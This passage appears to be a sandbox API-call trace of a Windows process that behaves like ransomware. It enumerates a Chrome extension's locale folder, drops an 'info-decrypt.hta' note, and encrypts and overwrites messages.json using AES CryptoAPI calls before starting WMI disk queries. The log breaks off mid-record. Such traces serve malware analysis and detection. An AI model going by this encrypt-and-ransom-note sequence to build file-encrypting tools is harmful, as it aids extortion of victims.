FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0209.012] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.013] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0209.013] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0209.013] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0209.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0209.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0209.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0209.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", lpFilePart=0x0) returned 0x89 [0209.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\", lpFilePart=0x0) returned 0x8a [0209.013] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0209.014] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.014] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0209.014] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0209.014] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0209.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0209.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0209.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", lpFilePart=0x0) returned 0x97 [0209.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0209.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e928) returned 1 [0209.015] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949e9a4 | out: lpFileInformation=0x949e9a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0209.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e924) returned 1 [0209.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", lpFilePart=0x0) returned 0x97 [0209.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e368, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0209.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e85c) returned 1 [0209.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0209.016] GetFileType (hFile=0x264) returned 0x1 [0209.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e858) returned 1 [0209.016] GetFileType (hFile=0x264) returned 0x1 [0209.016] WriteFile (in: hFile=0x264, lpBuffer=0x3842abc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949e920, lpOverlapped=0x0 | out: lpBuffer=0x3842abc*, lpNumberOfBytesWritten=0x949e920*=0x1000, lpOverlapped=0x0) returned 1 [0209.017] WriteFile (in: hFile=0x264, lpBuffer=0x3842abc*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949e8f4, lpOverlapped=0x0 | out: lpBuffer=0x3842abc*, lpNumberOfBytesWritten=0x949e8f4*=0x55e, lpOverlapped=0x0) returned 1 [0209.018] CloseHandle (hObject=0x264) returned 1 [0209.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", lpFilePart=0x0) returned 0x97 [0209.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e974) returned 1 [0209.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x3843ad8 | out: lpFileInformation=0x3843ad8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110)) returned 1 [0209.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e970) returned 1 [0209.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", lpFilePart=0x0) returned 0x97 [0209.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e8a8) returned 1 [0209.040] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0209.040] GetFileType (hFile=0x264) returned 0x1 [0209.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e8a4) returned 1 [0209.040] GetFileType (hFile=0x264) returned 0x1 [0209.041] GetFileSize (in: hFile=0x264, lpFileSizeHigh=0x949e9b0 | out: lpFileSizeHigh=0x949e9b0*=0x0) returned 0x110 [0209.041] ReadFile (in: hFile=0x264, lpBuffer=0x3843f4c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e95c, lpOverlapped=0x0 | out: lpBuffer=0x3843f4c*, lpNumberOfBytesRead=0x949e95c*=0x110, lpOverlapped=0x0) returned 1 [0209.041] CloseHandle (hObject=0x264) returned 1 [0209.041] CryptAcquireContextW (in: phProv=0x949e8fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e8fc*=0xbe0690) returned 1 [0209.043] CryptGenRandom (in: hProv=0xbe0690, dwLen=0x10, pbBuffer=0x38452a0 | out: pbBuffer=0x38452a0) returned 1 [0209.528] CryptImportKey (in: hProv=0xbe0690, pbData=0x39ed408, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e8cc | out: phKey=0x949e8cc*=0xb7f950) returned 1 [0209.528] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.528] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.528] CryptDuplicateKey (in: hKey=0xb7f950, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e8bc | out: phKey=0x949e8bc*=0xb7f890) returned 1 [0209.528] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.528] CryptSetKeyParam (hKey=0xb7f890, dwParam=0x4, pbData=0x39ed4e8*=0x1, dwFlags=0x0) returned 1 [0209.528] CryptSetKeyParam (hKey=0xb7f890, dwParam=0x1, pbData=0x39ed4b4, dwFlags=0x0) returned 1 [0209.528] CryptEncrypt (in: hKey=0xb7f890, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39ed4f8*, pdwDataLen=0x949e928*=0x120, dwBufLen=0x120 | out: pbData=0x39ed4f8*, pdwDataLen=0x949e928*=0x120) returned 1 [0209.528] CryptEncrypt (in: hKey=0xb7f890, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39ed63c*, pdwDataLen=0x949e930*=0x0, dwBufLen=0x10 | out: pbData=0x39ed63c*, pdwDataLen=0x949e930*=0x10) returned 1 [0209.529] CryptDestroyKey (hKey=0xb7f950) returned 1 [0209.529] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0209.529] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0209.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", lpFilePart=0x0) returned 0x97 [0209.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e894) returned 1 [0209.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0209.530] GetFileType (hFile=0x27c) returned 0x1 [0209.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e890) returned 1 [0209.530] GetFileType (hFile=0x27c) returned 0x1 [0209.530] WriteFile (in: hFile=0x27c, lpBuffer=0x39edd04*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e924, lpOverlapped=0x0 | out: lpBuffer=0x39edd04*, lpNumberOfBytesWritten=0x949e924*=0x20, lpOverlapped=0x0) returned 1 [0209.531] CloseHandle (hObject=0x27c) returned 1 [0209.531] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0209.531] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0209.531] CoTaskMemFree (pv=0xbed438) [0209.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0209.531] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8d0 | out: ppv=0x949e8d0*=0xb51e34) returned 0x0 [0209.532] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8c8 | out: pAptType=0x949e8c8*=1) returned 0x0 [0209.532] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8cc | out: ppvObject=0x949e8cc*=0x0) returned 0x80004002 [0209.532] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.532] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e238 | out: ppv=0x949e238*=0x60273f0) returned 0x0 [0209.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x60273f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e450 | out: ppvObject=0x949e450*=0x0) returned 0x80004002 [0209.533] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60273f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e464 | out: ppvObject=0x949e464*=0x6030d30) returned 0x0 [0209.533] WbemDefPath:IUnknown:Release (This=0x60273f0) returned 0x0 [0209.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e084 | out: ppvObject=0x949e084*=0x6030d30) returned 0x0 [0209.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e040 | out: ppvObject=0x949e040*=0x0) returned 0x80004002 [0209.533] WbemDefPath:IUnknown:AddRef (This=0x6030d30) returned 0x3 [0209.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d99c | out: ppvObject=0x949d99c*=0x0) returned 0x80004002 [0209.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d94c | out: ppvObject=0x949d94c*=0x0) returned 0x80004002 [0209.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d958 | out: ppvObject=0x949d958*=0xbdf1c0) returned 0x0 [0209.533] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf1c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d960 | out: pCid=0x949d960*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.533] WbemDefPath:IUnknown:Release (This=0xbdf1c0) returned 0x3 [0209.533] CoGetContextToken (in: pToken=0x949d9b8 | out: pToken=0x949d9b8) returned 0x0 [0209.533] CoGetContextToken (in: pToken=0x949ddc0 | out: pToken=0x949ddc0) returned 0x0 [0209.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de50 | out: ppvObject=0x949de50*=0x0) returned 0x80004002 [0209.533] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x2 [0209.533] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x1 [0209.533] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0209.533] CoGetContextToken (in: pToken=0x949e6a8 | out: pToken=0x949e6a8) returned 0x0 [0209.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x949e778*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e774 | out: ppvObject=0x949e774*=0x6030d30) returned 0x0 [0209.533] WbemDefPath:IUnknown:AddRef (This=0x6030d30) returned 0x3 [0209.533] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x2 [0209.534] WbemDefPath:IWbemPath:SetText (This=0x6030d30, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x949e8f8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f8*=0x20, pszText=0x0) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=2, puBuffLength=0x949e8f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030d30, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030d30, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030d30, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x949e87c | out: puCount=0x949e87c*=0x0) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e868 | out: puCount=0x949e868*=0x2) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0x0, pszText=0x0 | out: puBuffLength=0x949e864*=0xf, pszText=0x0) returned 0x0 [0209.534] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e864*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.534] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 